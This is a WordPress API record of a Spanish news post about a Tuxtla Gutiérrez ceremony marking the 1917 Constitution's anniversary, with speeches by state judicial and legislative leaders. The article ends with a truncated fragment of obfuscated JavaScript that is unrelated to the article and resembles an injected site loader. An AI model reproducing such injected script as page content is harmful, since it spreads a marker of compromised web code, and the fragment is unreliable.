{"id":20221,"date":"2025-02-06T05:34:56","date_gmt":"2025-02-06T05:34:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20221"},"modified":"2025-02-06T05:34:57","modified_gmt":"2025-02-06T05:34:57","slug":"atender-con-humanismo-las-necesidades-del-pueblo-reflexion-en-este-dia-de-nuestra-carta-magna-juan-carlos-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20221","title":{"rendered":"Atender con humanismo las necesidades del pueblo, reflexi\u00f3n en este d\u00eda de nuestra Carta Magna: Juan Carlos Moreno Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0039-1024x683.jpg\" alt=\"\" class=\"wp-image-20222\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0039-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0039-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0039-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0039-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0039-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>5 de febrero del 2025. Tuxtla Guti\u00e9rrez.-En una emotiva ceremonia c\u00edvica, el presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 en la conmemoraci\u00f3n del CVIII Aniversario de la Promulgaci\u00f3n de la Constituci\u00f3n de 1917, en las instalaciones del Palacio Legislativo.<\/p>\n\n\n\n<p>En su participaci\u00f3n desde la tribuna, Moreno Guill\u00e9n expres\u00f3 su gratitud al Gobierno del Estado y al Congreso del Estado por la invitaci\u00f3n y mencion\u00f3 la emoci\u00f3n que le caus\u00f3 escuchar la poes\u00eda &#8220;Mi patria chica&#8221; recitada por el joven estudiante H\u00e9ctor Antonio Jim\u00e9nez Chandom\u00ed, quien, con su talento, logr\u00f3 tocar el coraz\u00f3n de todos los y las presentes.<\/p>\n\n\n\n<p>El tambi\u00e9n presidente del Consejo de la Judicatura, Moreno Guill\u00e9n record\u00f3 que la promulgaci\u00f3n de nuestra Constituci\u00f3n de 1917, fortaleci\u00f3 el sistema pol\u00edtico post-revolucionario y sent\u00f3 las bases de un nuevo proyecto de naci\u00f3n, uno que, por primera vez en el mundo, reconoci\u00f3 los derechos sociales.<\/p>\n\n\n\n<p>Finalmente, en este importante d\u00eda, hizo un llamado a reflexionar sobre nuestra responsabilidad colectiva de continuar transformando nuestra entidad y nuestro pa\u00eds, atendiendo con humanismo las necesidades del pueblo, porque, como enfatiz\u00f3, &#8220;para el pueblo, la justicia es la paz.&#8221;<\/p>\n\n\n\n<p>Por su parte, el presidente de la Mesa Directiva del Congreso del Estado, diputado Luis Ignacio Avenda\u00f1o Berm\u00fadez, durante su participaci\u00f3n manifest\u00f3 que nuestra Constituci\u00f3n es un documento que adem\u00e1s de consolidar los ideales de la Revoluci\u00f3n Mexicana, sent\u00f3 las bases de nuestro Estado moderno. Adem\u00e1s, es una norma precursora de la protecci\u00f3n de los derechos y las libertades individuales, una de las m\u00e1s avanzadas de su \u00e9poca, al reconocer derechos sociales y fundamentales y establecer una nueva relaci\u00f3n entre Estado y sociedad.<\/p>\n\n\n\n<p>En este evento estuvieron presentes, en representaci\u00f3n del gobernador Eduardo Ram\u00edrez Aguilar, la secretaria de Gobierno y Mediaci\u00f3n, Patricia Conde Ruiz; el comandante de la 31a Zona Militar, general de Brigada, Estado Mayor, Rom\u00e1n Villalvazo Barrios; el coordinador estatal de la Guardia Nacional en el estado de Chiapas, comisario jefe Antonio Hern\u00e1ndez Tejeda; de diputadas y diputados que integran la Sexag\u00e9sima Novena Legislatura; entre otros.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 5 de febrero del 2025. Tuxtla Guti\u00e9rrez.-En una emotiva ceremonia c\u00edvica, el presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 en la conmemoraci\u00f3n del CVIII Aniversario de la Promulgaci\u00f3n de la Constituci\u00f3n de 1917, en las instalaciones del Palacio Legislativo. En su participaci\u00f3n desde la tribuna, Moreno Guill\u00e9n expres\u00f3 su gratitud &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20222,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20221","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20221"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20221\/revisions"}],"predecessor-version":[{"id":20223,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20221\/revisions\/20223"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20222"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}